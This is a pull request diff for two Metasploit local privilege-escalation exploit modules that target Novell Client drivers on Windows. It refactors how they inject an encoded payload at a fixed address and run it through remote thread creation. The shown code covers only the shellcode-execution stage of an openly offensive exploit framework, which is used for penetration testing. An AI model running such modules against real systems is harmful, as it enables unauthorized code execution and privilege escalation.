### PR TITLE
[SeeRM:#8136] & [SeeRM:#8137] - Use execute_shellcode in novell modules

### DIFF
--- a/modules/exploits/windows/local/novell_client_nicm.rb
+++ b/modules/exploits/windows/local/novell_client_nicm.rb
@@ -9,12 +9,14 @@ require 'msf/core'
 require 'rex'
 require 'msf/core/post/common'
 require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/process'
 
 class Metasploit3 < Msf::Exploit::Local
 	Rank = AverageRanking
 
 	include Msf::Post::Common
 	include Msf::Post::Windows::Priv
+	include Msf::Post::Windows::Process
 
 	def initialize(info={})
 		super(update_info(info, {
@@ -143,26 +145,6 @@ class Metasploit3 < Msf::Exploit::Local
 		end
 
 		return handle
-	end
-
-	def execute_shellcode(shell_addr)
-
-		vprint_status("Creating the thread to execute the shellcode...")
-		ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, "CREATE_SUSPENDED", nil)
-		if ret['return'] < 1
-			vprint_error("Unable to CreateThread")
-			return nil
-		end
-		hthread = ret['return']
-
-		vprint_status("Resuming the Thread...")
-		ret = client.railgun.kernel32.ResumeThread(hthread)
-		if ret['return'] < 1
-			vprint_error("Unable to ResumeThread")
-			return nil
-		end
-
-		return true
 	end
 
 	def ring0_shellcode(t)
@@ -319,29 +301,12 @@ class Metasploit3 < Msf::Exploit::Local
 			print_good("Exploitation successful!")
 		end
 
-		print_status("Storing the final payload on memory...")
-
-		shell_address = 0x0c0c0000
-		shell_address = allocate_memory(this_proc, shell_address, 0x1000)
-
-		if shell_address.nil?
-			fail_with(Exploit::Failure::Unknown, "Failed to allocate memory")
-		end
-
-		result = this_proc.memory.write(shell_address, payload.encoded)
-
-		if result.nil?
-			fail_with(Exploit::Failure::Unknown, "Failed to write contents to memory")
+		p = payload.encoded
+		print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
+		if execute_shellcode(p, 0x0c0c0000)
+			print_good("Enjoy")
 		else
-			print_good("Contents successfully written to 0x#{shell_address.to_s(16)}")
-		end
-
-		print_status("Executing the payload...")
-		result = execute_shellcode(shell_address)
-		if result.nil?
 			fail_with(Exploit::Failure::Unknown, "Error while executing the payload")
-		else
-			print_good("Enjoy!")
 		end
 	end
 

--- a/modules/exploits/windows/local/novell_client_nwfs.rb
+++ b/modules/exploits/windows/local/novell_client_nwfs.rb
@@ -9,12 +9,14 @@ require 'msf/core'
 require 'rex'
 require 'msf/core/post/common'
 require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/process'
 
 class Metasploit3 < Msf::Exploit::Local
 	Rank = AverageRanking
 
 	include Msf::Post::Common
 	include Msf::Post::Windows::Priv
+	include Msf::Post::Windows::Process
 
 	def initialize(info={})
 		super(update_info(info, {
@@ -158,26 +160,6 @@ class Metasploit3 < Msf::Exploit::Local
 		end
 
 		return nil
-	end
-
-	def execute_shellcode(shell_addr)
-
-		vprint_status("Creating the thread to execute the shellcode...")
-		ret = session.railgun.kernel32.CreateThread(nil, 0, shell_addr, nil, "CREATE_SUSPENDED", nil)
-		if ret['return'] < 1
-			vprint_error("Unable to CreateThread")
-			return nil
-		end
-		hthread = ret['return']
-
-		vprint_status("Resuming the Thread...")
-		ret = client.railgun.kernel32.ResumeThread(hthread)
-		if ret['return'] < 1
-			vprint_error("Unable to ResumeThread")
-			return nil
-		end
-
-		return true
 	end
 
 	def ring0_shellcode(t)
@@ -368,21 +350,12 @@ class Metasploit3 < Msf::Exploit::Local
 			print_good("Exploitation successful!")
 		end
 
-		print_status("Storing the final payload on memory...")
-		shell_address = 0x0c0c0000
-		result = fill_memory(this_proc, shell_address, 0x1000, payload.encoded)
-		if result.nil?
-			fail_with(Exploit::Failure::Unknown, "Error while storing the final payload on memory")
+		p = payload.encoded
+		print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
+		if execute_shellcode(p, 0x0c0c0000)
+			print_good("Enjoy")
 		else
-			print_good("Final payload successfully stored at 0x#{shell_address.to_s(16)}")
-		end
-
-		print_status("Executing the payload...")
-		result = execute_shellcode(shell_address)
-		if result.nil?
 			fail_with(Exploit::Failure::Unknown, "Error while executing the payload")
-		else
-			print_good("Enjoy!")
 		end
 
 	end


### PR DESCRIPTION
Use execute_shellcode() found in Msf::Post::Windows::Processo instead of having their own.  Please: It's best to give Juan time to review this.
